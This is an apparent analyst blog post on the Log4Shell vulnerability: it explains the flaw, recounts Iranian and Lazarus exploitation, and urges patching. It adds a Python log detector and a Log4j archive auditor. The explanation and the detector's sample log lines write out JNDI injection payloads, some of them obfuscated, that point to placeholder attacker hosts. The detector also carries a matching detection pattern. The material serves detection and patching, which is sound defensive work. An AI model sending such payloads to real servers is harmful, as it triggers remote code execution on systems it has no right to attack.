
Log4Shell Turns 2—And Is Still Being Exploited

By: Craig Kennedy


Log4Shell is turning into an annual end-of-year topic: the continuing saga of attacks exploiting a two-year-old Apache Log4j vulnerability that was patched, yes, two years ago.

What is Log4Shell?

Log4Shell (CVE-2021-44228) is a critical remote code execution (RCE) vulnerability in Apache Log4j 2, a widely used Java logging library. Affected versions evaluate lookup expressions embedded in the messages they log, so an attacker who could get a string such as ${jndi:ldap://attacker-host/a} written to a log (through an HTTP header or a form field, for example) could make the server fetch and run attacker-supplied code. The flaw was reported to Apache in November 2021 and a fixed release was published in early December 2021. It carries the maximum CVSS score of 10.0 and was first covered by Aragon Research in December 2021 in Apache Log4j – Are You at Risk?
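As an added example (not code from the original article), here is a small Python detector that finds Log4Shell exploit attempts in web-server access logs. It URL-decodes each line and collapses the nested lookups attackers use to hide the string jndi (${lower:j}, ${::-j} and similar default-value tricks) before matching, because a plain search for ${jndi: misses those. The log lines, attacker addresses and paths are constructed for illustration.

```python
"""Detect Log4Shell (CVE-2021-44228) exploit attempts in access-log lines.

Added example, not part of the original article. The sample log lines are
constructed; attacker hosts use RFC 5737 documentation addresses.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body containing no further "$", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we look for once obfuscation is stripped: "${jndi:" in any case/spacing.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's string substitution
    would for the patterns attackers use to hide "jndi".  Lookups we do not
    model (jndi, env, sys, date, ...) are returned untouched."""
    body = match.group(1)
    # Default-value syntax ${name:-default}: an empty or unknown name yields
    # the default, so ${::-j} -> "j" and ${env:NOSUCHVAR:-j} -> "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if sep:
        p = prefix.strip().lower()
        if p == "lower":
            return key.lower()
        if p == "upper":
            return key.upper()
    return match.group(0)


def normalize(text, max_rounds=20):
    """URL-decode (twice, to handle double encoding) and collapse nested
    lookups until the string stops changing."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        collapsed = _INNER_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_log(lines):
    """Return one finding per line that carries a JNDI lookup after
    normalization: the line index, the de-obfuscated payload and the raw line."""
    findings = []
    for idx, line in enumerate(lines):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            payload = norm[m.start():] if end == -1 else norm[m.start():end + 1]
            findings.append({"line": idx, "payload": payload, "raw": line})
    return findings


# Constructed sample log (Apache combined format); lines 0, 1 and 3 are attacks.
SAMPLE_LOG_LINES = [
    # plain payload in the User-Agent header
    '203.0.113.10 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.77:1389/a}"',
    # URL-encoded, with ${lower:j} nesting to hide the keyword in the query string
    '203.0.113.11 - - [10/Dec/2021:03:14:16 +0000] "GET /login?user='
    '%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.77%3A1389%2Fa%7D HTTP/1.1" '
    '404 0 "-" "curl/7.68.0"',
    # benign request
    '198.51.100.5 - - [10/Dec/2021:03:14:17 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    # default-value trick spelling out "jndi" one letter at a time, RMI transport
    '203.0.113.12 - - [10/Dec/2021:03:14:18 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.77:1099/x}"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['payload']}")
```

The detector handles the lower/upper and default-value obfuscations that appeared in the wild in December 2021; other lookup prefixes (date, env with a real value) are left as-is and would need their own rules, so pair this with an inventory of which hosts actually run a vulnerable Log4j.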

One Year Later—Iranian-Backed Attack on US Government Agencies

Log4Shell was top of mind a year later when the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint advisory in November 2022 following an intrusion into a US federal agency's network. The attackers, attributed to the Iranian government, exploited the Log4j vulnerability in an unpatched, internet-facing VMware Horizon server and used that foothold to move laterally through the agency's network. Aragon Research covered it in November 2022 in The persistence of Log4j.

Two Years Later—Log4Shell is Once Again Back in the News

A North Korean state-backed group known as Lazarus is back in the news for exploiting the Log4Shell vulnerability and deploying new malware written in D (DLang), a systems programming language that is rarely seen in attack tooling.

Standing Out from Other Hackers

Most hacking groups rely on proven, widely shared attack toolkits, in part because blending in with other groups makes attribution harder. Lazarus instead writes its own tooling, in languages other groups rarely use.

The logic on Lazarus's side is that detection signatures and analyst familiarity are tuned to the common toolkits, so malware in an unusual language was less likely to be flagged. The downside for them is that, now that the tooling has been identified, the unusual language choice becomes a fingerprint that helps attribute new intrusions to Lazarus.

This Vulnerability Was Patched 2 Years Ago, Right?

Two years after this vulnerability was identified, rated 10 out of 10 in severity, and fixed in a release available to all users, astonishingly, over a third of applications are still running a vulnerable version of Log4j.

Lazarus Tactics

Lazarus used the Log4Shell vulnerability to gain initial access and then established command and control (C2) channels from inside the victim's infrastructure to deploy its custom malware.

Lazarus has been exploiting Log4Shell in unpatched VMware Horizon servers that are publicly accessible on the internet. Once in, the attackers carry out extensive reconnaissance and install remote access trojans that use the popular messaging app Telegram for command and control. They then deploy a custom proxy tool to maintain persistent access, create a new local user account, and download credential-dumping tools.

Drop Everything and Patch Your Systems

Patching this two-year-old vulnerability should be a top priority for every enterprise. Aragon Research strongly advises organizations to update every instance of Log4j in their ecosystem to the latest release, or at a minimum to version 2.17.1 (2.12.4 on the Java 7 branch and 2.3.2 on the Java 6 branch). Patching is the only complete remedy for Log4Shell, and nothing short of a complete and detailed audit will confirm that you are not at risk: Log4j is frequently bundled inside application archives (WAR and EAR files, shaded or "fat" JARs, vendor appliances), so the audit has to inspect what is actually deployed rather than only the dependencies declared in build files.
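As an added example (not code from the article, Aragon Research or the Apache project), the following Python script performs the kind of deployment audit the paragraph above calls for: it opens every JAR, WAR and EAR under a directory, recurses into archives nested inside them (WEB-INF/lib, shaded "fat" JARs), reads the Maven pom.properties to get the Log4j version, checks whether JndiLookup.class is still present, and classifies each copy against the fixed release for its branch. The sample WAR it scans when run without arguments is constructed in memory; the fixed-version table reflects the Apache Log4j security page.

```python
"""Inventory every copy of Log4j inside Java archives, nested ones included.

Added example for this article, not code from Aragon Research or the Apache
project. The sample WAR is constructed in memory so the script runs offline;
point scan_tree() at a real deployment directory to audit it.
"""
import io
import os
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_CANDIDATES = (
    "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",  # Log4j 2.x core
    "META-INF/maven/log4j/log4j/pom.properties",                          # Log4j 1.x
)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Fixed releases per branch (Apache Log4j security page): Java 6 -> 2.3.2,
# Java 7 -> 2.12.4, everything else -> 2.17.1.
FIXED_BY_BRANCH = {"2.3": (2, 3, 2), "2.12": (2, 12, 4)}
FIXED_DEFAULT = (2, 17, 1)


def parse_version(pom_properties):
    """Return (major, minor, patch) from a pom.properties body, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties, re.MULTILINE)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify(version, has_jndi_lookup):
    """Decide what a found copy means for CVE-2021-44228."""
    if version is not None and version[0] != 2:
        return "log4j1-unaffected"  # 1.x has no JNDI lookup class (but is end-of-life)
    if version is None:
        return "vulnerable" if has_jndi_lookup else "unknown-version"
    fixed = FIXED_BY_BRANCH.get(f"2.{version[1]}", FIXED_DEFAULT)
    if version >= fixed:
        return "patched"
    if has_jndi_lookup:
        return "vulnerable"
    # JndiLookup.class deleted (the December 2021 emergency workaround): not
    # exploitable via Log4Shell, but still below the fixed release, so upgrade.
    return "mitigated-class-removed"


def scan_archive(data, label, findings=None):
    """Scan an archive given as bytes; recurse into archives it contains so
    that WEB-INF/lib jars and shaded 'fat' jars are covered."""
    if findings is None:
        findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = zf.namelist()
        has_class = JNDI_LOOKUP_CLASS in names
        version = None
        for pom in POM_CANDIDATES:
            if pom in names:
                version = parse_version(zf.read(pom).decode("utf-8", "replace"))
                break
        if has_class or version is not None:
            findings.append({"archive": label, "version": version,
                             "jndi_lookup_present": has_class,
                             "status": classify(version, has_class)})
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{label}!{name}", findings)
    return findings


def scan_tree(root):
    """Walk a directory and scan every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings


def _make_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_war():
    """Constructed sample: a WAR whose WEB-INF/lib holds an old log4j-core
    2.14.1, a patched 2.17.1, and a fat jar embedding a 2.15.0 copy with
    JndiLookup.class deleted."""
    fake_class = b"\xca\xfe\xba\xbe"  # just the class-file magic number
    old = _make_zip({POM_CANDIDATES[0]: "version=2.14.1\n", JNDI_LOOKUP_CLASS: fake_class})
    patched = _make_zip({POM_CANDIDATES[0]: "version=2.17.1\n", JNDI_LOOKUP_CLASS: fake_class})
    mitigated = _make_zip({POM_CANDIDATES[0]: "version=2.15.0\n"})
    fat = _make_zip({"com/example/App.class": fake_class, "lib/log4j-core-2.15.0.jar": mitigated})
    return _make_zip({
        "WEB-INF/lib/log4j-core-2.14.1.jar": old,
        "WEB-INF/lib/log4j-core-2.17.1.jar": patched,
        "WEB-INF/lib/app-all.jar": fat,
    })


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_archive(build_sample_war(), "app.war")
    for f in results:
        print(f"{f['status']:<24} {str(f['version']):<12} {f['archive']}")
```

A copy reported as mitigated-class-removed is not exploitable through CVE-2021-44228 but is still below the fixed release and should be upgraded. Copies whose packages were relocated by a shading tool will not match the class path above, so treat a clean result as the start of the audit, not the end of it.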

Bottom Line

The Lazarus campaign against Log4Shell highlights how attractive long-known vulnerabilities remain to attackers. It is a stark reminder to identify and patch vulnerabilities as soon as fixes are available; in this case, the fix has been available for two years.

